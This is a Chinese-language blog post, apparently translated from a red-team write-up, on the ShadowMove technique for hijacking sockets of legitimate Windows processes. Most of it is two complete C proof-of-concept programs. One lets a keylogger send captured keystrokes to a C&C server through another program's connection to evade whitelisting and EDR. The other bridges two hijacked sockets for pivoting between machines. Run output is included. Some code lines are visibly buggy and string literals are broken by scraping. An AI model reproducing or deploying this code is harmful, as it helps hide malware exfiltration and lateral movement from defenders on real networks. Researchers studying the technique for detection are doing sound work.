ShadowMove套接字劫持技术,巧妙隐藏与C2的连接
- >
- 话题 >
概述
在这篇文章中,我们将跟大家介绍如何使用ShadowMove技术在合法程序的网络连接中隐藏自己的恶意链接。我们将展示两个使用ShadowMove技术的PoC,并隐藏我们的恶意软件所建立的连接。第一种...
概述
在这篇文章中,我们将跟大家介绍如何使用ShadowMove技术在合法程序的网络连接中隐藏自己的恶意链接。我们将展示两个使用ShadowMove技术的PoC,并隐藏我们的恶意软件所建立的连接。第一种方法是完全可靠的,但是第二种方法有自己的问题,如果你要在实际操作中使用它,就必须解决这些问题,我们将在文章的最后讨论这些问题。
ShadowMove介绍
ShadowMove是一种从non-cooperative进程中劫持Socket的新技术,发布于2020年USENIX大会上的一篇标题为《ShadowMove: A Stealthy Lateral Movement Strategy》的文章首次讨论了这一技术。这种技术利用了以下事实:AFD(辅助函数驱动程序)文件句柄被Windows API视为Socket句柄,因此可以使用WSADuplicateSocket()函数来复制它们。
从non-cooperative进程劫持Socket的一种常见模式,是从进程注入开始的,以便加载我们自己的逻辑来查找和复用目标Socket。但是在ShadowMove技术的帮助下,我们完全不需要注入任何东西:它只需要打开具有PROCESS_DUP_HANDLE权限的进程句柄。
在这个句柄的帮助下,我们可以开始复制所有其他的文件句柄,直到找到名为\Device\Afd的文件句柄,然后使用getpeername()检查它是否属于与目标的连接。
为什么这项技术对于红队来说非常有意思?
在我们最近的一次红队评估过程中,我们不得不在目标设备中安装我们的键盘记录器,但是它会屏蔽任何由非白名单二进制文件建立的任何连接。为了避免这个问题,我们需要向一个允许向外建立连接的进程中注入我们的键盘记录器。但是在ShadowMove技术的帮助下,我们可以避免任何可能由注入产生的噪声(没错,我们可以使用其他方法来绕过EDR,但到目前为止,这种方法更干净)。
在合法进程中隐藏到C&C的连接
假设我们有一个键盘记录程序,我们想使用ShadowMove将截获的密钥发送到我们的C&C。每当我们必须发送一批密钥时,我们需要运行一个合法的程序并尝试连接到我们的C&C,比如说mssql客户端。当建立连接之后,我们必须使用键盘记录器来劫持连接。当然,在企业环境中,我们还需要通过企业代理来设置连接,而不是直接连接到C&C,但是让我们暂时忘记这一点。
ShadowMove技术的实现步骤如下:
使用PROCESS_DUP_HANDLE权限打开所有者进程;
每一个句柄为0x24(文件)类型;
复制句柄;
检索句柄名称;
如果名称不是\device\afd,则跳过;
获取远程IP和远程端口号;
如果远程IP和端口与输入参数不匹配,则跳过;
调用WSADuplicateSocketW以获取特殊的WSAPROTOCOL_INFO结构;
创建重复的Socket;
使用这个Socket;
为此,我们创建了一个名为“ShadowMove Gateway”的PoC。基本上,我们只需要提供进程PID和我们C&C的IP地址即可:
/
/ PoC of ShadowMove Gateway by Juan Manuel Fernández (@TheXC3LL)
?
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
?
#pragma comment(lib,"WS2_32")
?
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
?
?
?
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
?
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
?
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
?
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
?
?
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
?
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
?
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
?
?
?
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize=0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo={ 0 };
SOCKET targetSocket;
?
// Open target process with PROCESS_DUP_HANDLE rights
hProc=OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!
");
exit(-1);
}
printf("[+] Handle to process obtained!
");
?
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation=(_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject=(_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject=(_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
?
// Retrieve handles from the target process
handleInfo=(PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status=NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL))==STATUS_INFO_LENGTH_MISMATCH)
handleInfo=(PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *=2);
?
printf("[+] Found [%d] handlers in PID %d
============================
", handleInfo->HandleCount, dwProcessId);
?
// Iterate
for (DWORD i=0; i < handleInfo->HandleCount; i++) {
?
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber==0x24) {
?
SYSTEM_HANDLE handle=handleInfo->Handles[i];
HANDLE dupHandle=NULL;
POBJECT_NAME_INFORMATION objectNameInfo;
?
// Dupplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo=(POBJECT_NAME_INFORMATION)malloc(0x1000);
?
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
?
// Narrow the search checking if the name length is correct (len(\Device\Afd)==11 * 2)
if (objectNameInfo->Name.Length==22) {
printf("[-] Testing %d of %d
", i, handleInfo->HandleCount);
?
// Check if it ends in "Afd"
LPWSTR needle=(LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0]=='A' && needle[1]=='f' && needle[2]=='d') {
?
// We got a candidate
printf(" [*] \\Device\\Afd found at %d!
", i);
?
// Try to duplicate the socket
status=WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status !=0) {
printf(" [X] Error duplicating socket!
");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
?
// We got it?
targetSocket=WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket !=INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len=sizeof(SOCKADDR_IN);
?
// It this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len)==0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP)==0) {
printf(" [*] Duplicated socket (%s)
", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
?
}
?
free(needle);
}
?
}
free(objectNameInfo);
?
}
}
?
return 0;
}
?
?
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessId;
LPWSTR dstIP=NULL;
SOCKET targetSocket;
char buff[255]={ 0 };
?
printf(" -=[ ShadowMove Gateway PoC ]=-
");
?
// smgateway.exe [PID] [IP dst]
if (argc !=3) {
printf("[!] Error: syntax is %s [PID] [IP dst]
", argv[0]);
exit(-1);
}
dwProcessId=strtoul(argv[1], NULL, 10);
dstIP=(LPSTR)malloc(strlen(argv[2]) * (char) + 1);
memcpy(dstIP, argv[2], strlen(dstIP));
?
?
// Classic
wVersionRequested=MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
?
targetSocket=findTargetSocket(dwProcessId, dstIP);
send(targetSocket, "Hello From the other side!
", strlen("Hello From the other side!
"), 0);
recv(targetSocket, buff, 255, 0);
printf("
[*] Message from outside:
%s
", buff);
return 0;
}
在这里,我们只需要从受感染设备发送一条“Hello from the other side!”消息给C&C服务器,然后C&C服务器就会返回一条“Stay hydrated!”给受感染设备。
两台设备之间的通信“桥梁”
我们刚刚看到了如何使用ShadowMove将程序转换为本地植入的代理,但同样的方法也可以用于两台机器之间的通信。设想一个场景,我们有三台机器:A <--> B <--> C。如果我们想从A访问C的公开服务,那么我们必须在B中转发流量(使用netsh或代理)。当然了,我们也可以使用ShadowMove技术来实现这个目标。
我们只需要在B中执行两个合法程序:一个连接到A中的一个开放端口,另一个连接到C中的目标服务,然后劫持这两个Socket并桥接它们。
注意:假设我们想从A执行ldapsearch,而域控制器位于C。那么在A中,我们需要一个脚本来暴露这两个端口,一个从ldapsearch(A')接收连接,另一个从B(A'')接收连接。因此,在A'中接收的所有内容都被发送到A'(通过B连接),然后我们的网桥将所有内容转发到B和C之间的连接。
在B中执行的代码与我们以前使用的几乎相同:
// PoC of ShadowMove Pivot by Juan Manuel Fernández (@TheXC3LL)
?
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <Windows.h>
#include <stdio.h>
?
#pragma comment(lib,"WS2_32")
?
// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1
#define MSG_END_OF_TRANSMISSION "\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
#define BUFSIZE 65536
?
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
?
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
?
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
?
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
?
?
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
?
typedef struct _OBJECT_NAME_INFORMATION
{
UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
?
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName)
{
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
?
?
?
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
HANDLE hProc;
PSYSTEM_HANDLE_INFORMATION handleInfo;
DWORD handleInfoSize=0x10000;
NTSTATUS status;
DWORD returnLength;
WSAPROTOCOL_INFOW wsaProtocolInfo={ 0 };
SOCKET targetSocket;
?
// Open target process with PROCESS_DUP_HANDLE rights
hProc=OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (!hProc) {
printf("[!] Error: could not open the process!
");
exit(-1);
}
printf("[+] Handle to process obtained!
");
?
// Find the functions
_NtQuerySystemInformation NtQuerySystemInformation=(_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject=(_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
_NtQueryObject NtQueryObject=(_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");
?
// Retrieve handles from the target process
handleInfo=(PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status=NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL))==STATUS_INFO_LENGTH_MISMATCH)
handleInfo=(PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *=2);
?
printf("[+] Found [%d] handlers in PID %d
============================
", handleInfo->HandleCount, dwProcessId);
?
// Iterate
for (DWORD i=0; i < handleInfo->HandleCount; i++) {
?
// Check if it is the desired type of handle
if (handleInfo->Handles[i].ObjectTypeNumber==0x24) {
?
SYSTEM_HANDLE handle=handleInfo->Handles[i];
HANDLE dupHandle=NULL;
POBJECT_NAME_INFORMATION objectNameInfo;
?
// Dupplicate handle
NtDuplicateObject(hProc, (HANDLE)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
objectNameInfo=(POBJECT_NAME_INFORMATION)malloc(0x1000);
?
// Get handle info
NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
?
// Narrow the search checking if the name length is correct (len(\Device\Afd)==11 * 2)
if (objectNameInfo->Name.Length==22) {
printf("[-] Testing %d of %d
", i, handleInfo->HandleCount);
?
// Check if it ends in "Afd"
LPWSTR needle=(LPWSTR)malloc(8);
memcpy(needle, objectNameInfo->Name.Buffer + 8, 6);
if (needle[0]=='A' && needle[1]=='f' && needle[2]=='d') {
?
// We got a candidate
printf(" [*] \\Device\\Afd found at %d!
", i);
?
// Try to duplicate the socket
status=WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo);
if (status !=0) {
printf(" [X] Error duplicating socket!
");
free(needle);
free(objectNameInfo);
CloseHandle(dupHandle);
continue;
}
?
// We got it?
targetSocket=WSASocket(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
if (targetSocket !=INVALID_SOCKET) {
struct sockaddr_in sockaddr;
DWORD len;
len=sizeof(SOCKADDR_IN);
?
// It this the socket?
if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len)==0) {
if (strcmp(inet_ntoa(sockaddr.sin_addr), dstIP)==0) {
printf(" [*] Duplicated socket (%s)
", inet_ntoa(sockaddr.sin_addr));
free(needle);
free(objectNameInfo);
return targetSocket;
}
}
?
}
?
free(needle);
}
?
}
free(objectNameInfo);
?
}
}
?
return 0;
}
?
// Reused from MSSQLPROXY https://github.com/blackarrowsec/mssqlproxy/blob/master/reciclador/reciclador.cpp
void bridge(SOCKET fd0, SOCKET fd1)
{
int maxfd, ret;
fd_set rd_set;
size_t nread;
char buffer_r[BUFSIZE];
maxfd=(fd0 > fd1) ? fd0 : fd1;
while (1) {
FD_ZERO(&rd_set);
FD_SET(fd0, &rd_set);
FD_SET(fd1, &rd_set);
ret=select(maxfd + 1, &rd_set, NULL, NULL, NULL);
if (ret < 0 && errno==EINTR) {
continue;
}
if (FD_ISSET(fd0, &rd_set)) {
nread=recv(fd0, buffer_r, BUFSIZE, 0);
if (nread <=0)
break;
send(fd1, buffer_r, nread, 0);
}
if (FD_ISSET(fd1, &rd_set)) {
nread=recv(fd1, buffer_r, BUFSIZE, 0);
?
if (nread <=0)
break;
?
// End of transmission
if (nread >=strlen(MSG_END_OF_TRANSMISSION) && strstr(buffer_r, MSG_END_OF_TRANSMISSION) !=NULL) {
send(fd0, buffer_r, nread - strlen(MSG_END_OF_TRANSMISSION), 0);
break;
}
?
send(fd0, buffer_r, nread, 0);
}
}
}
?
?
int main(int argc, char** argv) {
WORD wVersionRequested;
WSADATA wsaData;
DWORD dwProcessIdSrc;
WORD dwProcessIdDst;
LPSTR dstIP=NULL;
LPSTR srcIP=NULL;
SOCKET srcSocket;
SOCKET dstSocket;
?
printf(" -=[ ShadowMove Pivot PoC ]=-
");
?
// smpivot.exe [PID src] [PID dst] [IP dst] [IP src]
if (argc !=5) {
printf("[!] Error: syntax is %s [PID src] [PID dst] [IP src] [IP dst]
", argv[0]);
exit(-1);
}
dwProcessIdSrc=strtoul(argv[1], NULL, 10);
dwProcessIdDst=strtoul(argv[2], NULL, 10);
?
dstIP=(LPSTR)malloc(strlen(argv[4]) * (char) + 1);
memcpy(dstIP, argv[3], strlen(dstIP));
srcIP=(LPSTR)malloc(strlen(argv[3]) * (char) + 1);
memcpy(srcIP, argv[4], strlen(srcIP));
?
// Classic
wVersionRequested=MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
?
srcSocket=findTargetSocket(dwProcessIdSrc, srcIP);
?
dstSocket=findTargetSocket(dwProcessIdDst, dstIP);
if (srcSocket==0) {
printf("
[!] Error: could not attach to source socket");
return -1;
}
printf("
[<] Attached to SOURCE
");
if (dstSocket==0) {
printf("
[!] Error: could not attach to sink socket");
return -1;
}
printf("[>] Attached to SINK
");
printf("============================
[Link up]
============================
");
bridge(srcSocket, dstSocket);
printf("============================
[Link down]
============================
");
return 0;
}
我们可以通过连接两个监听的netcat来进行测试,其中一个为10.0.2.2,另一个为10.0.2.15:
-=[ ShadowMove Pivot PoC ]=- ? [+] Handle to process obtained! [+] Found [66919] handlers in PID 5364============================[-] Testing 3779 of 66919 [-] Testing 10254 of 66919 [*] \Device\Afd found at 10254! [*] Duplicated socket (10.0.2.15) [+] Handle to process obtained! [+] Found [67202] handlers in PID 7596============================[-] Testing 3767 of 67202 [-] Testing 10240 of 67202 [*] \Device\Afd found at 10240! [*] Duplicated socket (10.0.2.2) ? [<] Attached to SOURCE [>] Attached to SINK============================[Link up]============================In one of our ends: ? psyconauta@insulanova:~/Research/shadowmove|? ?nc -lvp 8081 Listening on [0.0.0.0] (family 0, port 8081) Connection from localhost 59596 received! Hello from 10.0.2.15! This is me from 10.0.2.2!
问题与解决方案
数据冲突
我们在使用复制的Socket时,原始的程序还会持续进行数据读取。这也就意味着,如果程序代替我们读取某些字节,它们可能会丢失,但如果我们实现了一个处理丢失数据包的自定义协议,则可以很容易地解决这一问题。
超时
如果在劫持Socket之前,连接因超时而关闭的话,我们就不能复用目标Socket了。
旧的句柄
根据所使用的程序,可能会找到满足我们条件的旧句柄(getpeername返回目标IP,但句柄不能使用)。如果第一次连接尝试失败,可能会发生这种情况。要解决这个问题,只需改进检测方法。
- 发表于 2021-04-20 15:13
- 阅读 ( 271 )
- 分类:互联网
0 条评论
请先 登录 后评论
